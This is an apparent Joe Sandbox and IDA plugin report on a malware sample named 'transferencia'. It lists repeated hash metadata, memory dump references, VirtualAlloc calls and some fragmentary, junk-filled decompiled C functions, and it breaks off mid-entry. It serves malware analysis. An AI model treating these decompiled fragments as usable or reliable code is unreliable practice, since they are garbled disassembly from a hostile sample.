Associated: 00000000.00000002.851373742.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.851384548.0000000000413000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_transferencia.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 529031cecbab3466febcec2301e43f809af5becf03d633f96719d6d011c780fa
Instruction ID: cef1469b63454c1013eb0cd0f9d302ced396830b232a02e8ea3410194a0679c9
Opcode Fuzzy Hash: 529031cecbab3466febcec2301e43f809af5becf03d633f96719d6d011c780fa
Instruction Fuzzy Hash: 87812662B0A7004B976994BE88C0957D4C7DFEB26063AF63A652DF33A4ED79CD4B0148

Uniqueness

Uniqueness Score: -1.00%

Function 00404BBE, Relevance: 1.6, APIs: 1, Instructions: 398memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,FFFF9E89,FFFFFC61), ref: 00404EBC

Memory Dump Source

Source File: 00000000.00000002.851346844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.851335620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.851373742.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.851384548.0000000000413000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_transferencia.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c778827ef7d1c2efdd79f425950ea2a5d9593eedd82983a7097a8af191670b6f
Instruction ID: bf6f9946c2a99239aa1353fa96b9fd247c9de1b0efaa060aa05f956702b798aa
Opcode Fuzzy Hash: c778827ef7d1c2efdd79f425950ea2a5d9593eedd82983a7097a8af191670b6f
Instruction Fuzzy Hash: 55713922B0A7004B976998BE88D0957D0C7DFEB26163AF63A552DF3364ED7DCD4B0148

Uniqueness

Uniqueness Score: -1.00%

Function 00404C43, Relevance: 1.6, APIs: 1, Instructions: 355memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,FFFF9E89,FFFFFC61), ref: 00404EBC

Memory Dump Source

Source File: 00000000.00000002.851346844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.851335620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.851373742.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.851384548.0000000000413000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_transferencia.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 5452e879bf8664b23895f611a6027b3b2c3f93731046276ffad6ed3a6c46a057
Instruction ID: cd8289ba30a40de1e0f7b740496e7f103d08f4acfd11b5da50dd5ab4784a8881
Opcode Fuzzy Hash: 5452e879bf8664b23895f611a6027b3b2c3f93731046276ffad6ed3a6c46a057
Instruction Fuzzy Hash: A7613822B1A7004B976998BE48C0957D4C7DFEB26073AE63A652DF73A4ED7DCC4B0148

Uniqueness

Uniqueness Score: -1.00%

Function 00404CD3, Relevance: 1.6, APIs: 1, Instructions: 338memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,FFFF9E89,FFFFFC61), ref: 00404EBC

Memory Dump Source

Source File: 00000000.00000002.851346844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.851335620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.851373742.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.851384548.0000000000413000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_transferencia.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 8ebe235dc00ea1437d2f7df073d0b95fc1d1270768e84cb343889318d7666d39
Instruction ID: 6cdedd27c0d60703f8ac46374e5f3259a00f338dc526ac0054625ec7912067bc
Opcode Fuzzy Hash: 8ebe235dc00ea1437d2f7df073d0b95fc1d1270768e84cb343889318d7666d39
Instruction Fuzzy Hash: 0A513822B097004B876998BE48C0957D4C7DFEB26077AE63A662DF3364EDBDCD4B0148

Uniqueness

Uniqueness Score: -1.00%

Function 00404D5A, Relevance: 1.6, APIs: 1, Instructions: 301
memoryCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E00404D5A(signed int __eax, void* __ebx, void* __ecx, void* __esi, void* __eflags, void* __fp0) {
				void* _t174;
				intOrPtr* _t188;
				intOrPtr* _t189;
				void* _t203;
				void* _t206;

				_t206 = __eflags;
				_t203 = __esi;
				_t174 = __ecx;
				asm("fnop");
				asm("fnop");
				_t189 = _t188;
				asm("fnop");
				asm("fnop");
				_push(__eax ^ 0x00001d64);
				asm("fnop");
				asm("fnop");
				asm("fldz");
				asm("fcos");
				while(1) {
					 *_t189 =  *_t189 - 1;
					asm("fcmovnbe st0, st6");
					asm("pandn xmm2, xmm3");
					goto L3;
					if (_t206 < 0) goto L2;
					asm("repne dec esi");
				}
			}

0x00404d5a
0x00404d5a
0x00404d5a
0x00404d90
0x00404da6
0x00404da9
0x00404dac
0x00404db4
0x00404db6
0x00404db7
0x00404db9
0x00404dbd
0x00404dbf
0x00404dc0
0x00404dc0
0x00404dc2
0x00404dc4
0x00404dc4
0x00404dcc
0x00404dcd
0x00404dcd

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,FFFF9E89,FFFFFC61), ref: 00404EBC

Memory Dump Source

Source File: 00000000.00000002.851346844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.851335620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.851373742.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.851384548.0000000000413000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_transferencia.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: e59a523d068d5c5b2c4ab01a67402ed5863fd1a753dfb5274e3bb48c40a6d03f
Instruction ID: be5fe5cc33c9d3c3268ed3a28098581f052cd78d129a4140f447e0dc383da15c
Opcode Fuzzy Hash: e59a523d068d5c5b2c4ab01a67402ed5863fd1a753dfb5274e3bb48c40a6d03f
Instruction Fuzzy Hash: 97514B22B097004B876998BE48C0957D0C7DFDB26077AE63A652DF3364FDB9CD4B0148

Uniqueness

Uniqueness Score: -1.00%

Function 00404E65, Relevance: 1.5, APIs: 1, Instructions: 236memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,FFFF9E89,FFFFFC61), ref: 00404EBC

Memory Dump Source

Source File: 00000000.00000002.851346844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.851335620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.851373742.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.851384548.0000000000413000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_transferencia.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 5220ce04ca21de6ae4b29a6af07715e5c240b13692706125586cc56c69a8922e
Instruction ID: adaf6c69f26cf9f76051f51c22fa92c0b883e69e491f622a9c4fdf9c8fc82b5c
Opcode Fuzzy Hash: 5220ce04ca21de6ae4b29a6af07715e5c240b13692706125586cc56c69a8922e
Instruction Fuzzy Hash: F6414C32B0A7004B875988BE58D0917D1C7DFEB26173AAA3A652DF3365FDB9CC4B0548

Uniqueness

Uniqueness Score: -1.00%

Function 00404E05, Relevance: 1.5, APIs: 1, Instructions: 232
memoryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00404E05(void* __eax, void* __ecx, void* __esi, void* __fp0) {
				void* _t36;
				void* _t61;
				void* _t64;

				_t61 = __esi;
				_t36 = __ecx;
				while(1) {
					if (_t64 < 0) goto L1;
					asm("repne dec esi");
				}
			}

0x00404e05
0x00404e05
0x00404dcc
0x00404dcc
0x00404dcd
0x00404dcd

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,FFFF9E89,FFFFFC61), ref: 00404EBC

Memory Dump Source

Source File: 00000000.00000002.851346844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.851335620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.851373742.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.851384548.0000000000413000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_transferencia.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: e91c56bf91940a1219fc736a5d300c7b93fc37ddce3c64e57d74efb664a6a482
Instruction ID: 4d0676aa3c6042205a5f55e2e0680a445c03cb65188585f4321de6dd9c1bc5f0
Opcode Fuzzy Hash: e91c56bf91940a1219fc736a5d300c7b93fc37ddce3c64e57d74efb664a6a482
Instruction Fuzzy Hash: A9516D72B197004B875958BE48C0917D0D7DFEB26077AA63A662DF33A4EDB9CC4B1148

Uniqueness

Uniqueness Score: -1.00%

Function 00404DF7, Relevance: 1.5, APIs: 1, Instructions: 229memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,FFFF9E89,FFFFFC61), ref: 00404EBC

Memory Dump Source

Source File: 00000000.00000002.851346844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.851335620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.851373742.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.851384548.0000000000413000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_transferencia.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 3a1fa9e72f09bccdc18ba8ba248ca06a487e4bdeb242ba269755eab105069747
Instruction ID: 10ff86fadeb87377a098e45c27a3d8a9645287ee6b85825c6585512dca1164e6
Opcode Fuzzy Hash: 3a1fa9e72f09bccdc18ba8ba248ca06a487e4bdeb242ba269755eab105069747
Instruction Fuzzy Hash: 7A515E36B1A7004B875598BE48C0917D0C7DFEB26177AA63A662DF33A4FDB9CC4B1148

Uniqueness

Uniqueness Score: -1.00%

Function 00404DED, Relevance: 1.5, APIs: 1, Instructions: 228memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,FFFF9E89,FFFFFC61), ref: 00404EBC

Memory Dump Source

Source File: 00000000.00000002.851346844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.851335620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.851373742.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.851384548.0000000000413000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_transferencia.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d4208e44c8a1786c50e69122444a520afb1dd960242b7232feee3388d47fe0a0
Instruction ID: 0eb339429bac2f99b1ca3691a51eda27c30fe97d8c59131fb0df6e4eb18d3377
Opcode Fuzzy Hash: d4208e44c8a1786c50e69122444a520afb1dd960242b7232feee3388d47fe0a0
Instruction Fuzzy Hash: 97415C22B097004B876598BE48C0917D0C7DFEB26177AAA3A662DF3364EDB9CC4B1148

Uniqueness

Uniqueness Score: -1.00%

Function 00404E03, Relevance: 1.5, APIs: 1, Instructions: 227
memoryCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00404E03(void* __eax, void* __ecx, void* __esi, void* __fp0) {
				void* _t36;
				void* _t61;
				void* _t64;

				_t61 = __esi;
				_t36 = __ecx;
				asm("aas");
				asm("hlt");
				_t64 = __eax - 0xebebebeb;
				while(1) {
					if (_t64 < 0) goto L1;
					asm("repne dec esi");
				}
			}

0x00404e03
0x00404e03
0x00404ddc
0x00404ddd
0x00404dde
0x00404dcc
0x00404dcc
0x00404dcd
0x00404dcd

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,FFFF9E89,FFFFFC61), ref: 00404EBC

Memory Dump Source

Source File: 00000000.00000002.851346844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.851335620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.851373742.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.851384548.0000000000413000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_transferencia.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: cf027771450e9483475844f193f8fb00727435a563e65f8d430057007f7fa410
Instruction ID: bfa17e83de6ab5e0db06ff35fbbb30bc592c7304057e50c927bf9243ca52209f
Opcode Fuzzy Hash: cf027771450e9483475844f193f8fb00727435a563e65f8d430057007f7fa410
Instruction Fuzzy Hash: E2414D22B197004B876598BE58C0917D0C7DFEB26077AAA3A662DF3365EDB9CC4B1148

Uniqueness

Uniqueness Score: -1.00%

Function 00404DDB, Relevance: 1.5, APIs: 1, Instructions: 227
memoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00404DDB(void* __eax, void* __ecx, void* __esi, void* __fp0) {
				void* _t36;
				void* _t61;
				void* _t64;

				_t61 = __esi;
				_t36 = __ecx;
				asm("popfd");
				asm("aas");
				asm("hlt");
				while(1) {
					if (_t64 < 0) goto L1;
					asm("repne dec esi");
				}
			}

0x00404ddb
0x00404ddb
0x00404ddb
0x00404ddc
0x00404ddd
0x00404dcc
0x00404dcc
0x00404dcd
0x00404dcd

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,FFFF9E89,FFFFFC61), ref: 00404EBC

Memory Dump Source

Source File: 00000000.00000002.851346844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.851335620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.851373742.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.851384548.0000000000413000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_transferencia.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 01e28ec6ac2b790760511d5ec4b23bf3ecf8e338389b0784b625e58aa00c8ba6
Instruction ID: f27be5610f81a268ff98af4dca00d2dab094be5dd2ea6d86d546bd1b84f3713e
Opcode Fuzzy Hash: 01e28ec6ac2b790760511d5ec4b23bf3ecf8e338389b0784b625e58aa00c8ba6
Instruction Fuzzy Hash: 9A415D32B197004B876598BE58C0917D0C7DFEB26177AAA3A662DF3364FDB9CC4B0148

Uniqueness

Uniqueness Score: -1.00%

Function 00404DEF, Relevance: 1.5, APIs: 1, Instructions: 227
memoryCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00404DEF(void* __eax, void* __ecx, void* __esi, void* __fp0) {
				void* _t36;
				void* _t61;
				void* _t64;

				_t61 = __esi;
				_t36 = __ecx;
				asm("aas");
				asm("hlt");
				_t64 = __eax - 0xebebebeb;
				while(1) {
					if (_t64 < 0) goto L1;
					asm("repne dec esi");
				}
			}

0x00404def
0x00404def
0x00404ddc
0x00404ddd
0x00404dde
0x00404dcc
0x00404dcc
0x00404dcd
0x00404dcd

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,FFFF9E89,FFFFFC61), ref: 00404EBC

Memory Dump Source

Source File: 00000000.00000002.851346844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.851335620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.851373742.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.851384548.0000000000413000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_transferencia.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: e65086e9fa67c587a01c36e0d10d52426fd14890a188bf576b81bb65aa1ee442
Instruction ID: 3ee0db340a1e37b43b27bd6186afd8df9bafbacbf29bff4935746a0cb56803a2
Opcode Fuzzy Hash: e65086e9fa67c587a01c36e0d10d52426fd14890a188bf576b81bb65aa1ee442
Instruction Fuzzy Hash: A0416D32B197004B876598BE48C0917D0C7DFEB26177AAA3A662DF3364FDB9CC4B0148

Uniqueness

Uniqueness Score: -1.00%

Function 00404E07, Relevance: 1.5, APIs: 1, Instructions: 226
memoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00404E07(void* __eax, void* __ecx, void* __esi, void* __eflags, void* __fp0) {
				void* _t35;

				_t35 = __ecx;
				while(1) {
					if (__eflags < 0) goto L1;
					asm("repne dec esi");
				}
			}

0x00404e07
0x00404dcc
0x00404dcc
0x00404dcd
0x00404dcd

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,FFFF9E89,FFFFFC61), ref: 00404EBC

Memory Dump Source

Source File: 00000000.00000002.851346844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.851335620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.851373742.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.851384548.0000000000413000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_transferencia.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 5c31166c1ee2018b61a7f8a99ec0caac2347ba6f39870344c3b381224511aa8b
Instruction ID: 169ddc315fb7bf8a9df5187c010a4cd855c92ea0abbd5f3fee58a046c954def1
Opcode Fuzzy Hash: 5c31166c1ee2018b61a7f8a99ec0caac2347ba6f39870344c3b381224511aa8b
Instruction Fuzzy Hash: A4414C32B197004B875998BE48C0917D0D7DFEB26077AA63A662DF33A4FDB9CC4B1148

Uniqueness

Uniqueness Score: -1.00%

Function 00404E09, Relevance: 1.5, APIs: 1, Instructions: 225
memoryCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00404E09(void* __eax, void* __ecx, void* __esi, void* __eflags, void* __fp0) {
				void* _t36;
				void* _t61;
				void* _t64;

				_t64 = __eflags;
				_t61 = __esi;
				_t36 = __ecx;
				while(1) {
					asm("psllw xmm5, 0x5");
					asm("psllw mm5, 0x5");
					if (_t64 >= 0) goto L2;
					asm("cmc");
				}
			}

0x00404e09
0x00404e09
0x00404e09
0x00404dcf
0x00404dcf
0x00404dd0
0x00404dd1
0x00404dd2
0x00404dd2

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,FFFF9E89,FFFFFC61), ref: 00404EBC

Memory Dump Source

Source File: 00000000.00000002.851346844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.851335620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.851373742.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.851384548.0000000000413000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_transferencia.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 164b123b53f81110118ffd6b1fb18aa6412946c3eece69505c4a1bfc4ba354f8
Instruction ID: d5f0fe793b8c14ce47abf302e02715b4f6afb21116e6591d63439ad3cc28b2b1
Opcode Fuzzy Hash: 164b123b53f81110118ffd6b1fb18aa6412946c3eece69505c4a1bfc4ba354f8
Instruction Fuzzy Hash: 1D414C26B197004B875998BE48C0917D0C7DFEB26077AA63A662DF3365FDB9CC4B1148

Uniqueness

Uniqueness Score: -1.00%

Function 00404DF1, Relevance: 1.5, APIs: 1, Instructions: 225
memoryCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00404DF1(void* __eax, void* __ecx, void* __esi, void* __fp0) {
				void* _t36;
				void* _t61;
				void* _t64;

				_t61 = __esi;
				_t36 = __ecx;
				_t64 = __eax - 0xebebebeb;
				while(1) {
					if (_t64 < 0) goto L1;
					asm("repne dec esi");
				}
			}

0x00404df1
0x00404df1
0x00404dde
0x00404dcc
0x00404dcc
0x00404dcd
0x00404dcd

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,FFFF9E89,FFFFFC61), ref: 00404EBC

Memory Dump Source

Source File: 00000000.00000002.851346844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.851335620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.851373742.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.851384548.0000000000413000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_transferencia.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 9de60efc797df8c17cf4d528941345d743e3f2062932cba73cc96d376235c88e
Instruction ID: 335e73dcfad27647e5555c83a654bb0eb49539ec6006427f3558533b7c0398b2
Opcode Fuzzy Hash: 9de60efc797df8c17cf4d528941345d743e3f2062932cba73cc96d376235c88e
Instruction Fuzzy Hash: CF414D32B197004B876598BE58C0917D0C7DFEB26077AAA3A662DF3364FDB9CC4B1148

Uniqueness

Uniqueness Score: -1.00%

Function 00404DF3, Relevance: 1.5, APIs: 1, Instructions: 225
memoryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00404DF3(void* __eax, void* __ecx, void* __esi, void* __eflags, void* __fp0) {
				void* _t36;
				void* _t61;

				_t61 = __esi;
				_t36 = __ecx;
				while(1) {
					if (__eflags < 0) goto L1;
					asm("repne dec esi");
				}
			}

0x00404df3
0x00404df3
0x00404dcc
0x00404dcc
0x00404dcd
0x00404dcd

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,FFFF9E89,FFFFFC61), ref: 00404EBC

Memory Dump Source

Source File: 00000000.00000002.851346844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.851335620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.851373742.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.851384548.0000000000413000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_transferencia.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f4dc2cbf6a2e96f3f733df8d0a6a8d4c4d56f3a8dfd0750b53c03e23be03c3c3
Instruction ID: 3287805e206aa9ed96f5aefb4c09c497354f43a43d7fe5a3496751bc2ebec86e
Opcode Fuzzy Hash: f4dc2cbf6a2e96f3f733df8d0a6a8d4c4d56f3a8dfd0750b53c03e23be03c3c3
Instruction Fuzzy Hash: 6A415D32B197004B875998BE48C0917D0C7DFEB26077AA63A662DF33A4FDB9CC4B1148

Uniqueness

Uniqueness Score: -1.00%

Function 00404DF5, Relevance: 1.5, APIs: 1, Instructions: 224
memoryCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00404DF5(void* __eax, void* __ecx, void* __esi, void* __eflags, void* __fp0) {
				void* _t36;
				void* _t61;
				void* _t64;

				_t64 = __eflags;
				_t61 = __esi;
				_t36 = __ecx;
				while(1) {
					asm("psllw xmm5, 0x5");
					asm("psllw mm5, 0x5");
					if (_t64 >= 0) goto L2;
					asm("cmc");
				}
			}

0x00404df5
0x00404df5
0x00404df5
0x00404dcf
0x00404dcf
0x00404dd0
0x00404dd1
0x00404dd2
0x00404dd2

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,FFFF9E89,FFFFFC61), ref: 00404EBC

Memory Dump Source

Source File: 00000000.00000002.851346844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.851335620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.851373742.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.851384548.0000000000413000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_transferencia.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 49102225d7701773ca5fb7c67f35ce981cbb9341f337a67c91a068cdea56ba05
Instruction ID: c0ea9b2d1becb92551d0f8b562c9b0e2530bd9ad75abdd9d8098afda93a0bd9d
Opcode Fuzzy Hash: 49102225d7701773ca5fb7c67f35ce981cbb9341f337a67c91a068cdea56ba05
Instruction Fuzzy Hash: 55415D32B197004B875998BE48C0917D0C7DFEB26077AA63A662DF33A4FDB9CD4B1148

Uniqueness

Uniqueness Score: -1.00%

Function 00404DFB, Relevance: 1.5, APIs: 1, Instructions: 223memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,FFFF9E89,FFFFFC61), ref: 00404EBC

Memory Dump Source

Source File: 00000000.00000002.851346844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.851335620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.851373742.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.851384548.0000000000413000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_transferencia.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f16ba56a0afbb271cab34b771eff56bf93948b459fc76b4d9fd927083356daf2
Instruction ID: 9375655597e3bf4028a025e301084808dc9907a8a9bdf6ec9d3cad0312e1ed7e
Opcode Fuzzy Hash: f16ba56a0afbb271cab34b771eff56bf93948b459fc76b4d9fd927083356daf2
Instruction Fuzzy Hash: F6416D32B0A7004B875998BE48C0917D0C7DFEB26077AA63A662DF3364FDB9CC4B1148

Uniqueness

Uniqueness Score: -1.00%

Function 00404DE7, Relevance: 1.5, APIs: 1, Instructions: 222memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,FFFF9E89,FFFFFC61), ref: 00404EBC

Memory Dump Source

Source File: 00000000.00000002.851346844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.851335620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.851373742.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.851384548.0000000000413000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_transferencia.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 5324109339730f7b44c697bd2f31b94373272ce766939e6935c5726ce5699fce
Instruction ID: 4c1a194010ec4794f5c2c07606dfb59218356ac6b452517f15b2389a745a27f2
Opcode Fuzzy Hash: 5324109339730f7b44c697bd2f31b94373272ce766939e6935c5726ce5699fce
Instruction Fuzzy Hash: D2416C32B0A7004B875988BE48C0917D0C7DFEB26077AA63A262DF3364FDB9CC4B0148

Uniqueness

Uniqueness Score: -1.00%

Function 00404DFD, Relevance: 1.5, APIs: 1, Instructions: 222memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,FFFF9E89,FFFFFC61), ref: 00404EBC

Memory Dump Source

Source File: 00000000.00000002.851346844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.851335620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.851373742.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.851384548.0000000000413000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_transferencia.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b51061e188c129056c272e1ff1c6b9a00fca5b011deb49708fc4391443239c43
Instruction ID: bc53f2baa31302111ad7dc4f2a6d05761f5aea2c96f572f98f2c3d74f96c16d7
Opcode Fuzzy Hash: b51061e188c129056c272e1ff1c6b9a00fca5b011deb49708fc4391443239c43
Instruction Fuzzy Hash: AB416D32B097004B875998BE48D0917D0C7DFEB26077AA63A662DF3364FDB9CC4B1148

Uniqueness

Uniqueness Score: -1.00%

Function 00404DE9, Relevance: 1.5, APIs: 1, Instructions: 221memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,FFFF9E89,FFFFFC61), ref: 00404EBC

Memory Dump Source

Source File: 00000000.00000002.851346844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.851335620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.851373742.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.851384548.0000000000413000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_transferencia.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 14a2afb4d29ab64513a10b5d24796fcd0c7fa4525c910576a398d0625e39b8da
Instruction ID: be7d3f02218b2b70279877461b1e8882fd82f6701ca26354015427c01d6e5b24
